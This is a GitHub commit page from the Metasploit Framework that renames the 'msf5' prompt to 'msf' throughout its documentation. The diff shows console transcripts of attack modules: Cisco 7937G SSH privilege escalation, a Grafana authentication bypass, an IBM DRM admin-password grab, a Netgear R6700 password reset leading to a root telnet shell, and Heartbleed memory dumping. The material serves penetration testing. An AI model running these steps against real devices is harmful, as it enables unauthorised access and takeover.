Skip to content

Commit adff497

Browse files
committed
Updates msf5 as well
1 parent 469f102 commit adff497

File tree

461 files changed

+2977
-2977
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

461 files changed

+2977
-2977
lines changed

docs/metasploit-framework.wiki/Hashes-and-Password-Cracking.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,7 @@ puts identify_hash "_9G..8147mpcfKT8g0U."
1818
```
1919
In practice, we receive the following output from this:
2020
```ruby
21-
msf5 > irb
21+
msf > irb
2222
[*] Starting IRB shell...
2323
[*] You are in the "framework" object
2424

docs/metasploit-framework.wiki/How-to-get-Oracle-Support-working-with-Kali-Linux.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,7 @@ msf auxiliary(oracle_login) > run
1212
```
1313
or
1414
```msf
15-
msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
15+
msf auxiliary(scanner/oracle/oracle_hashdump) > run
1616
1717
[-] Failed to load the OCI library: cannot load such file -- oci8
1818
[-] Try 'gem install ruby-oci8'

docs/metasploit-framework.wiki/Metasploit-URL-support-proposal.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -61,7 +61,7 @@ When the user views the options for a given module, it will be consolidated. The
6161
Multiple options are available for configuring the module options:
6262

6363
```msf
64-
msf5 exploit(multi/http/tomcat_mgr_upload) > options
64+
msf exploit(multi/http/tomcat_mgr_upload) > options
6565
6666
Module options (exploit/multi/http/tomcat_mgr_upload):
6767
@@ -88,7 +88,7 @@ Exploit target:
8888
Multiple options are consolidated into a single TARGETS field:
8989

9090
```msf
91-
msf5 exploit(multi/http/tomcat_mgr_upload) > options
91+
msf exploit(multi/http/tomcat_mgr_upload) > options
9292
9393
Module options (exploit/multi/http/tomcat_mgr_upload):
9494

docs/metasploit-framework.wiki/Work-needed-to-allow-msfdb-to-use-postgresql-common.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -163,12 +163,12 @@ Start `msfconsole` and verify postgresql connection using the `db_status` comman
163163
mv ~/.msf4/config ~/.msf4/config.disable
164164
./msfconsole
165165
...
166-
msf5 > db_status
166+
msf > db_status
167167
[*] Connected to msf. Connection type: postgresql.
168168
```
169169

170170
Drop (delete) the cluster:
171171

172172
```
173173
PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_dropcluster 9.6 msf
174-
```
174+
```

documentation/cli/msfconsole/jobs.md

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -81,12 +81,12 @@ Examples
8181

8282
Starting a module as a job:
8383

84-
msf5 exploit(multi/handler) > run -j
84+
msf exploit(multi/handler) > run -j
8585
[*] Exploit running as background job 1.
8686

8787
A verbose listing of all the jobs:
8888

89-
msf5 exploit(multi/handler) > jobs -v
89+
msf exploit(multi/handler) > jobs -v
9090

9191
Jobs
9292
====
@@ -97,16 +97,16 @@ A verbose listing of all the jobs:
9797

9898
Set some jobs to be started on `msfconsole` start:
9999

100-
msf5 exploit(multi/handler) > jobs -p 1-2
100+
msf exploit(multi/handler) > jobs -p 1-2
101101
Added persistence to job 1.
102102
Added persistence to job 2.
103103

104104
Getting information about a specific job:
105105

106-
msf5 exploit(multi/handler) > jobs -i 1
106+
msf exploit(multi/handler) > jobs -i 1
107107

108108
Name: Generic Payload Handler, started at 2019-02-20 19:03:19 -0600
109-
msf5 exploit(multi/handler) > jobs -i 1 -v
109+
msf exploit(multi/handler) > jobs -i 1 -v
110110

111111
Name: Generic Payload Handler, started at 2019-02-20 19:03:19 -0600
112112

documentation/cli/msfconsole/repeat.md

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -30,8 +30,8 @@ Examples
3030

3131
Run the heartbleed module every 10 seconds against a server for an hour:
3232

33-
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
34-
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set ACTION DUMP
33+
msf > use auxiliary/scanner/ssl/openssl_heartbleed
34+
msf auxiliary(scanner/ssl/openssl_heartbleed) > set ACTION DUMP
3535
# Set other options...
36-
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > repeat -t 3600 run; sleep 10
36+
msf auxiliary(scanner/ssl/openssl_heartbleed) > repeat -t 3600 run; sleep 10
3737

documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md

Lines changed: 22 additions & 22 deletions
Original file line numberDiff line numberDiff line change
@@ -38,14 +38,14 @@ The desired username for setting SSH access
3838
#### Successful Scenario
3939

4040
```
41-
msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc
42-
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
41+
msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc
42+
msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
4343
user => test
44-
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
44+
msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
4545
pass => test
46-
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
46+
msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
4747
rhosts => 192.168.110.209
48-
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
48+
msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
4949
5050
[*] Running for 192.168.110.209...
5151
[*] 192.168.110.209 - Attempting to set SSH credentials.
@@ -55,7 +55,7 @@ msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
5555
[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
5656
[*] Scanned 1 of 1 hosts (100% complete)
5757
[*] Auxiliary module execution completed
58-
msf5 auxiliary(linux/ssh/cve_2020_16137) > exit
58+
msf auxiliary(linux/ssh/cve_2020_16137) > exit
5959
user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
6060
[email protected]'s password:
6161
@@ -225,14 +225,14 @@ $>exit
225225

226226
#### Unsuccessful Scenario
227227
```
228-
msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc
229-
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
228+
msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc
229+
msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
230230
user => test
231-
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
231+
msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
232232
pass => test
233-
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
233+
msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
234234
rhosts => 192.168.110.209
235-
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
235+
msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
236236
237237
[*] Running for 192.168.110.209...
238238
[*] 192.168.110.209 - Attempting to set SSH credentials.
@@ -246,14 +246,14 @@ msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
246246
#### Successful Scenario
247247

248248
```
249-
msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc
250-
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
249+
msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc
250+
msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
251251
user => test
252-
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
252+
msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
253253
pass => test
254-
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
254+
msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
255255
rhosts => 192.168.110.209
256-
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
256+
msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
257257
258258
[*] Running for 192.168.110.209...
259259
[*] 192.168.110.209 - Attempting to set SSH credentials.
@@ -263,7 +263,7 @@ msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
263263
[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
264264
[*] Scanned 1 of 1 hosts (100% complete)
265265
[*] Auxiliary module execution completed
266-
msf5 auxiliary(linux/ssh/cve_2020_16137) > exit
266+
msf auxiliary(linux/ssh/cve_2020_16137) > exit
267267
user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
268268
[email protected]'s password:
269269
@@ -433,14 +433,14 @@ $>exit
433433

434434
#### Unsuccessful Scenario
435435
```
436-
msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc
437-
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
436+
msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc
437+
msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
438438
user => test
439-
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
439+
msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
440440
pass => test
441-
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
441+
msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
442442
rhosts => 192.168.110.209
443-
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
443+
msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
444444
445445
[*] Running for 192.168.110.209...
446446
[*] 192.168.110.209 - Attempting to set SSH credentials.

documentation/modules/auxiliary/admin/http/grafana_auth_bypass.md

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -22,8 +22,8 @@ The following list shows the vulnerable versions of Grafana when configured for
2222
Example run against Grafana 3.x with username admin:
2323

2424
```
25-
msf5 > use auxiliary/admin/http/grafana_auth_bypass
26-
msf5 auxiliary(admin/http/grafana_auth_bypass) > show options
25+
msf > use auxiliary/admin/http/grafana_auth_bypass
26+
msf auxiliary(admin/http/grafana_auth_bypass) > show options
2727
2828
Module options (auxiliary/admin/http/grafana_auth_bypass):
2929
@@ -38,11 +38,11 @@ Module options (auxiliary/admin/http/grafana_auth_bypass):
3838
USERNAME no Valid username
3939
VERSION 5 yes Grafana version: "2-4" or "5" (Accepted: 2-4, 5)
4040
41-
msf5 auxiliary(admin/http/grafana_auth_bypass) > set RHOSTS 192.168.202.3
41+
msf auxiliary(admin/http/grafana_auth_bypass) > set RHOSTS 192.168.202.3
4242
RHOSTS => 192.168.202.3
43-
msf5 auxiliary(admin/http/grafana_auth_bypass) > set USERNAME Administrator
43+
msf auxiliary(admin/http/grafana_auth_bypass) > set USERNAME Administrator
4444
USERNAME => Administrator
45-
msf5 auxiliary(admin/http/grafana_auth_bypass) > run
45+
msf auxiliary(admin/http/grafana_auth_bypass) > run
4646
4747
[*] Running for 192.168.202.3...
4848
[+] Encrypted remember cookie: 1bedc565c40b58307afa4672efd72d3c37f02684c2deb0ce0b55594cbce337fc90625356dc232e998f

documentation/modules/auxiliary/admin/http/ibm_drm_download.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -25,7 +25,7 @@ Module defaults work very well, you should just need to set `RHOST` and the `FIL
2525
A successful exploit will look like this:
2626

2727
```
28-
msf5 auxiliary(admin/http/ibm_drm_file_download) > run
28+
msf auxiliary(admin/http/ibm_drm_file_download) > run
2929
3030
[+] 10.9.8.213:8443 - Successfully "stickied" our session ID kmhleyPh
3131
[+] 10.9.8.213:8443 - We have obtained a new admin password 28010e88-6ffb-46e9-90d6-2ded732120d1

documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md

Lines changed: 25 additions & 25 deletions
Original file line numberDiff line numberDiff line change
@@ -54,8 +54,8 @@ upnpd port on the target. Default 5000.
5454
### Netgear R6700v3 firmware version V1.0.4.84_10.0.58
5555

5656
```
57-
msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset
58-
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options
57+
msf > use auxiliary/admin/http/netgear_r6700_pass_reset
58+
msf auxiliary(admin/http/netgear_r6700_pass_reset) > show options
5959
6060
Module options (auxiliary/admin/http/netgear_r6700_pass_reset):
6161
@@ -67,13 +67,13 @@ upnpd port on the target. Default 5000.
6767
SSL false no Negotiate SSL/TLS for outgoing connections
6868
VHOST no HTTP server virtual host
6969
70-
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1
70+
msf auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1
7171
RHOSTS => 192.168.1.1
72-
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check
72+
msf auxiliary(admin/http/netgear_r6700_pass_reset) > check
7373
7474
[*] Target is running firmware version 1.0.4.84
7575
[*] 192.168.1.1:5000 - The target appears to be vulnerable.
76-
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
76+
msf auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
7777
[*] Running module against 192.168.1.1
7878
7979
[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.
@@ -93,24 +93,24 @@ upnpd port on the target. Default 5000.
9393
[*] 2.7- run it and login with 'admin:<WHATEVER>'
9494
[*] 3- Enjoy your root shell!
9595
[*] Auxiliary module execution completed
96-
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) >
96+
msf auxiliary(admin/http/netgear_r6700_pass_reset) >
9797
```
9898

9999
Browsed to admin page and changed password to `testing123`, then in a new `msfconsole`
100100
session running as `root`, entered the following commands:
101101

102102
```
103-
msf5 > use exploit/linux/telnet/netgear_telnetenable
103+
msf > use exploit/linux/telnet/netgear_telnetenable
104104
[*] No payload configured, defaulting to cmd/unix/interact
105-
msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin
105+
msf exploit(linux/telnet/netgear_telnetenable) > set username admin
106106
username => admin
107-
msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123
107+
msf exploit(linux/telnet/netgear_telnetenable) > set password testing123
108108
password => testing123
109-
msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9
109+
msf exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9
110110
MAC => D56C89FC94C9
111-
msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOSTS 192.168.1.1
111+
msf exploit(linux/telnet/netgear_telnetenable) > set RHOSTS 192.168.1.1
112112
RHOSTS => 192.168.1.1
113-
msf5 exploit(linux/telnet/netgear_telnetenable) > exploit
113+
msf exploit(linux/telnet/netgear_telnetenable) > exploit
114114
115115
[+] 192.168.1.1:23 - Detected telnetenabled on UDP
116116
[+] 192.168.1.1:23 - Using creds admin:testing123
@@ -147,8 +147,8 @@ session running as `root`, entered the following commands:
147147
### Netgear R6700v3 firmware version V1.0.0.4.82_10.0.57
148148

149149
```
150-
msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset
151-
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options
150+
msf > use auxiliary/admin/http/netgear_r6700_pass_reset
151+
msf auxiliary(admin/http/netgear_r6700_pass_reset) > show options
152152
153153
Module options (auxiliary/admin/http/netgear_r6700_pass_reset):
154154
@@ -160,13 +160,13 @@ session running as `root`, entered the following commands:
160160
SSL false no Negotiate SSL/TLS for outgoing connections
161161
VHOST no HTTP server virtual host
162162
163-
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1
163+
msf auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1
164164
RHOSTS => 192.168.1.1
165-
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check
165+
msf auxiliary(admin/http/netgear_r6700_pass_reset) > check
166166
167167
[*] Target is running firmware version 1.0.4.82
168168
[*] 192.168.1.1:5000 - The target appears to be vulnerable.
169-
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
169+
msf auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
170170
[*] Running module against 192.168.1.1
171171
172172
[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target.
@@ -186,16 +186,16 @@ session running as `root`, entered the following commands:
186186
[*] 2.7- run it and login with 'admin:<WHATEVER>'
187187
[*] 3- Enjoy your root shell!
188188
[*] Auxiliary module execution completed
189-
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) >
189+
msf auxiliary(admin/http/netgear_r6700_pass_reset) >
190190
```
191191

192192
Browsed to admin page and changed password to `testing123`, then in a new `msfconsole`
193193
session running as `root`, entered the following commands:
194194

195195
```
196-
msf5 > use exploit/linux/telnet/netgear_telnetenable
196+
msf > use exploit/linux/telnet/netgear_telnetenable
197197
[*] No payload configured, defaulting to cmd/unix/interact
198-
msf5 exploit(linux/telnet/netgear_telnetenable) > show options
198+
msf exploit(linux/telnet/netgear_telnetenable) > show options
199199
200200
Module options (exploit/linux/telnet/netgear_telnetenable):
201201
@@ -226,15 +226,15 @@ session running as `root`, entered the following commands:
226226
0 Automatic (detect TCP or UDP)
227227
228228
229-
msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOST 192.168.1.1
229+
msf exploit(linux/telnet/netgear_telnetenable) > set RHOST 192.168.1.1
230230
RHOST => 192.168.1.1
231-
set msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin
231+
set msf exploit(linux/telnet/netgear_telnetenable) > set username admin
232232
username => admin
233-
msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123
233+
msf exploit(linux/telnet/netgear_telnetenable) > set password testing123
234234
password => testing123
235-
msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9
235+
msf exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9
236236
MAC => D56C89FC94C9
237-
msf5 exploit(linux/telnet/netgear_telnetenable) > exploit
237+
msf exploit(linux/telnet/netgear_telnetenable) > exploit
238238
239239
[+] 192.168.1.1:23 - Detected telnetenabled on UDP
240240
[+] 192.168.1.1:23 - Using creds admin:testing123

0 commit comments

Comments
 (0)